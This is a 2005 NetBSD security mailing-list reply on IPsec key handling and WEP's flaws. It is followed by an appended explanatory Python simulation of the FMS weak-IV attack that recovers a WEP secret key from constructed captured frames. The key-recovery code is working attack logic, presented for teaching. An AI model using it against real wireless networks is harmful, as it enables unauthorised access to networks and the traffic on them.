Subject: Re: Maximising IKE/IPSec security?
To: None <tech-security@NetBSD.org>
From: Dmitri Nikulin <dnikulin@optusnet.com.au>
List: tech-security
Date: 04/17/2005 15:41:11
Steven M. Bellovin wrote:

>Yes, there's a risk of that key and feedback variable being 
>compromised.  The risk is greater than for the DSA secret key, since 
>the latter is generally protected by a passphrase.  Again, though, the 
>weak point is host security.
>  
>
The problem I have given myself is not passwording the DSA private key,
in order for the tunnels to be creatable by batches without wasting time
just piping in a phrase (which defeats the point, slows it down, and
complicates the implementation). Assuming the clients are secure (at
least so far as not being able to read arbitrary files on disk) there
shouldn't be a real problem.

>Right.  That is *the* weak point.  Can you force your users to use 
>Firefox or Opera instead of Internet Explorer?  Can you teach them not 
>to click "yes" just because some pop-up asks them to?  Do they 
>regularly run AV software, anti-spyware software, etc.?  Are they 
>running SP2 with the firewall turned to "paranoid"?  Do they have 
>their machines set to auto-download patches?
>  
>
Well, they're competent enough and I frequently supervise their
administration, including forcing Firefox use and so on.
Auto-downloading patches is not done (does the Autoupdate service honor
proxy settings?).

>WEP is a case study of why you really need to get some crypto 
>specialists involved when you're designing a cryptographic protocol.  
>The WEP folks made at least three serious mistakes, though one of them 
>-- that RC4 isn't as strong a cipher as had been thought -- was 
>unpredictable.  Several of the problems are described in
>http://www.isaac.cs.berkeley.edu/~iang/pubs/wep-mob01.pdf ; the 
>mistakes made there are, to be blunt, evidence of extreme inexperience. 
>  
>
Reading that, my theory that it was designed as an all-nighter by a kid
they pulled off the street and handed a "Kindergarten Crypto" book to is
supported. Considering IPSec has been around much longer and proven to
be much more sensible even with weak encryption, the least they could
have done is research into it and seen how it could be adapted to work
in smaller devices and only one key. "Oops".

>The cryptanalytic attack is described in
>http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps
>and the way to use it to attack WEP is in
>http://www.isoc.org/isoc/conferences/ndss/02/proceedings/papers/stubbl.pdf
>  
>
Every package manager already appears to have its own toolkits for WEP
subversion, but thanks for the documentation.

Good thing I decided to just do away with WEP: extra administration and
processing overhead (IPW 2200BG has software WEP) for chewing-gum
security. It should be illegal to continue calling it 'wired equivalent'
and especially advertising it as security. From what I hear everyone and
their dog can bring a sufficiently powerful laptop and subvert arbitrary
WEP networks just off battery power - but I hope it's not that severe.

-Dmitri Nikulin
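
The RC4 key-scheduling weakness and its application to WEP that the two
papers above describe (Fluhrer, Mantin and Shamir; Stubblefield, Ioannidis
and Rubin) can be reproduced in a few dozen lines. The following simulation
is an added example for this archive page, not code from either poster, from
the papers, or from NetBSD. It assumes a constructed 40-bit secret key, an
idealised capture containing every "weak" IV of the form (A+3, 0xFF, x) for
each key byte, the real-world known plaintext 0xAA (the 802.2 SNAP DSAP that
begins every WEP data frame), and a depth-4 candidate search with verification
against captured frames, which is the "fudge factor" approach of the cracking
tools, not something the papers prescribe.

```python
"""FMS weak-IV attack on WEP's use of RC4, as a self-contained simulation.

WEP builds the per-frame RC4 key as IV (3 bytes, sent in clear) || secret
(5 or 13 bytes).  Because the first plaintext byte of every data frame is
the 802.2 SNAP DSAP 0xAA, an attacker learns the first keystream byte of
every captured frame, which is all the FMS attack needs.
"""
from collections import Counter

SNAP_DSAP = 0xAA  # known first plaintext byte of every WEP data frame


def rc4_ksa(key):
    """RC4 key-scheduling algorithm: returns the permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_keystream_byte(key):
    """First PRGA output byte (i = 1, j = S[1])."""
    S = rc4_ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def wep_frame(iv, secret, plaintext_first=SNAP_DSAP):
    """Constructed 'capture' of one frame: (IV, first ciphertext byte)."""
    return bytes(iv), rc4_first_keystream_byte(bytes(iv) + secret) ^ plaintext_first


def fms_votes(a, prefix, frames):
    """Vote on secret byte a, given the a already-recovered bytes in prefix.

    Only IVs (a+3, 0xFF, x) whose simulated KSA is still 'resolved' after
    a+3 steps (S[0] == a+3 and S[1] == 0) are used.  For those, the first
    keystream byte equals S[a+3] of the final permutation with probability
    about e^-3 (5%), against 1/256 for any other value: that is the bias.
    """
    votes = Counter()
    for iv, c0 in frames:
        if iv[0] != a + 3 or iv[1] != 0xFF:
            continue
        key_known = list(iv) + list(prefix)  # the a+3 key bytes we know
        S = list(range(256))
        j = 0
        for i in range(a + 3):
            j = (j + S[i] + key_known[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[0] != a + 3 or S[1] != 0:
            continue  # resolved condition broken, IV carries no information
        z = c0 ^ SNAP_DSAP  # first keystream byte of this frame
        # KSA step i = a+3 sets S[a+3] = S[j + S[a+3] + K[a+3]].  If that
        # entry survives to the end of the KSA, z == S[a+3]; solve for K[a+3].
        votes[(S.index(z) - j - S[a + 3]) & 0xFF] += 1
    return votes


def fms_recover_key(frames, key_len, depth=4):
    """Depth-first search over the `depth` best-voted candidates per byte,
    verifying each complete candidate key against a few captured frames.
    Returns the secret key as bytes, or None if no candidate verifies."""
    checks = frames[:4]  # four frames: a wrong key passes with odds 2^-32

    def verifies(key):
        return all(rc4_first_keystream_byte(iv + key) ^ SNAP_DSAP == c0
                   for iv, c0 in checks)

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if verifies(prefix) else None
        for cand, _ in fms_votes(len(prefix), prefix, frames).most_common(depth):
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


def simulate(secret=bytes.fromhex("0badc0ffee")):
    """Constructed traffic: every weak IV (a+3, 0xFF, x) for every key byte,
    i.e. 256 frames per secret byte, then the attack against it."""
    frames = [wep_frame((a + 3, 0xFF, x), secret)
              for a in range(len(secret)) for x in range(256)]
    return fms_recover_key(frames, len(secret))


if __name__ == "__main__":
    print(simulate().hex())
```

The point a practitioner should take from running it is how little the
attacker needs: no plaintext beyond one fixed header byte, no interaction,
and only the frames whose IVs happen to have the weak shape, which a busy
network emits on its own. Real captures contain far fewer than all 256 weak
IVs per class, which is why tools collect for a while and vote over several
IV classes; the depth search here compensates for the occasional key byte that
is not the top vote-getter.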